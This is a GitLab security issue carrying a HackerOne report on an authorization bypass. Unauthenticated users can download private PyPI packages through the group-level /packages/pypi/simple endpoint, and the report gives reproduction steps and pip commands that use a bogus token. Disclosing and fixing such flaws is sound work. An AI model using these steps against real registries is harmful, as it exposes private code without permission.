Unauthenticated users can access private PyPI packages that belong to a public group using /api/v4/groups/{id}/-/packages/pypi/simple

⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2035173 by js_noob on 2023-06-22, assigned to @ottilia_westerlund:

Report | Attachments | How To Reproduce

Report

Summary

Hello team, as known when a package registry belongs to a private group it and Package registry is turned off in the project settings, this should block EVERY SINGLE user from accessing this project's package registries. However, if this project belonged to a public group, ANY UNAUTHENTICATED user can access and download those packages.

Steps to reproduce

As an owner:

1. Create a new public group
2. Create a private project in that group, with the content in the following zip file
3. After the project creation change the content of pyproject.toml and add your name and email

4. Verify that a pipeline is triggered
5. Wait a couple of minutes, then navigate to https://gitlab.com/GROUP/PROJECT/-/packages, and verify that a new package is created -- Now you can directly jump to step 9, or if you wanted to add another layer of security you can continue in order. But at this point, no external users should be able to access this package

6. Navigate to the project settings https://gitlab.com/GROUP/PROJECT/edit and disable Package registry

7. Let's try to fetch the package as the owner, on your PC terminal run (you can create PAT here https://gitlab.com/-/profile/personal_access_tokens)

pip install mypypipackage --index-url https://__token__:OWNER_ACCESS_TOKEN@gitlab.com/api/v4/projects/PROJECT_ID/packages/pypi/simple  

8. Verify that the owner can't access it. Ideally, if the owner can't no one should be able to, right?

As an unauthenticated user:

9. Navigate to https://gitlab.com/groups/GROUP/-/packages and verify that there are no packages you have access to
10. Run the following command in your terminal

pip install mypypipackage --index-url https://__token__:nooo-tokennn@gitlab.com/api/v4/groups/GROUP_ID/-/packages/pypi/simple  

11. Verify that you can access that private package without using an access token, i.e. without being logged in

As a double check:

You can check my private packages at https://gitlab.com/groups/my-nice-group-new-version/-/packages, verify that you can't see any packages.
Run the following command and verify that you can download my private package

pip install mypypipackage --index-url https://__token__:nooo-tokennn@gitlab.com/api/v4/groups/68082643/-/packages/pypi/simple  

Video/POC

bandicam_2023-06-22_20-40-23-327.mp4

Impact

Unauthenticated users can access private PyPI packages.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

• python-package-main.zip
• image.png
• bandicam_2023-06-22_20-40-23-327.mp4
• image_(1).png
• image.png

How To Reproduce

Please add reproducibility information to this section: